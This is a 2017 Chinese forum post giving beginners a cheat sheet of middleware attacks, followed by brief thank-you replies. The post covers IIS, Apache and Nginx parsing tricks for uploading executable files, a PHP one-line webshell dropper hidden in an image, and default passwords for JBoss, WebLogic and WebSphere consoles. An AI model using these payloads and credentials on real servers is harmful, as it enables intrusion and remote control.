[新手入门] 给新手整理的中间件漏洞

[复制链接]
查看7438 | 回复8 | 2017-6-1 18:49:18 | 显示全部楼层 |阅读模式
本帖最后由 tomyxy 于 2017-6-1 18:50 编辑

中间件漏洞
IIS
l IIS解析漏洞
IIS 6.0解析利用方法有两种:
1.目录解析
建立xx.asp为名称的文件夹,将asp文件放入,访问/xx.asp/xx.jpg,其中xx.jpg可以为任意文件后缀,即可解析
2.文件解析
后缀解析:/xx.asp;.jpg  /xx.asp:.jpg(此处需抓包修改文件名)
3.默认解析:
/xx.asa,/xx.cer,/xx.cdx
IIS7.5/ IIS 7.0/ Nginx <8.03畸形解析漏洞
IIS 7.5的解析漏洞利用手法,在正常图片URL后添加 /.php
常用利用方法: 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾
内容 <?PHP fputs(fopen(‘shell.php’,’w’),'<?phpeval($_POST[cmd])?>’);?>
通过windows下copy命令合成,或者用hex工具直接写也可以
然后访问xx.jpg/x.php,在这个目录下就会生成一句话木马shell.php
l IIS PUT漏洞
2个错误配置造成
1.WEB服务器扩展里设置WebDAV为允许;
2.网站权限配置里开启了写入权限。
使用桂林老兵的工具
l IIS溢出漏洞
开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,针对 Windows Server 2003 R2

Apache
l  解析漏洞
后缀解析:test.php.x1.x2.x3
Apache将从右至左开始判断后缀,若x3非可识别后缀,再判断x2,直到找到可识别后缀为止,然后将该可识别后缀进解析
test.php.x1.x2.x3 则会被解析为php
经验之谈:php|php3|phtml|php4|php5 多可被Apache解析

Nginx
l  解析漏洞
Nginx <8.03畸形解析漏洞
直接在正常图片URL后添加 /.php
Nginx <=0.8.37
在Fast-CGI关闭的情况下,Nginx <=0.8.37 依然存在解析漏洞
在一个文件路径(/xx.jpg)后面加上%00.php会将 /xx.jpg%00.php 解析为 php 文件。
这是从 /test.jpg/x.php 演变过来的,具体可以参考:Ngnix空字节可远程执行代码漏洞

JBOSS
l 存在java反序列化命令执行
端口:8080(Web)、9990(Console)
管理面板:http://<host>:9990
弱口令
jboss:jboss
admin:admin

Weblogic
l存在java反序列化命令执行
端口 7001、7002(Web、Console)
管理面板:http://<host>:7001/console/
弱口令
weblogic:weblogic
system:system
portaladmin:portaladmin
guest:guest
weblogic:admin123
weblogic:weblogic123

WebSphere
l存在java反序列化命令执行
端口:9080、9443(Web)、9060、9043(Console)、…
管理面板:
http://<host>:7043/ibm/console/logon.jsp

java反序列化漏洞网上有jar工具,自行查找下就ok了,使用就像struts2那种利用工具一样,看一眼就会用了

评分

参与人数 1银两 +6 收起 理由
Harry + 6 赞一个!

查看全部评分

回复

使用道具 举报

匿名 codog | 2017-7-4 23:25:57 | 显示全部楼层
非常详细,多谢大佬分享
回复

使用道具 举报

962620891 | 2017-12-15 19:16:10 | 显示全部楼层
thank you
回复

使用道具 举报

匿名 785597416 | 2018-1-1 12:20:06 | 显示全部楼层
不错不错
回复

使用道具 举报

wiiner | 2018-7-27 07:17:50 | 显示全部楼层
好东西,不错
回复

使用道具 举报

阿良 | 2018-9-25 15:39:47 | 显示全部楼层
今天再把这些看看就下班了
回复

使用道具 举报

Oliver | 2018-11-23 19:02:07 | 显示全部楼层
谢谢大佬分享
回复

使用道具 举报

Mr.轻熟男 | 2019-1-1 16:11:50 | 显示全部楼层
谢谢 分享~~~
回复

使用道具 举报

dreamwind | 2019-4-22 13:58:43 | 显示全部楼层
多谢分享,小白一个,好好学习中
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

2

主题

4

帖子

33

积分

初入江湖

Rank: 2

积分
33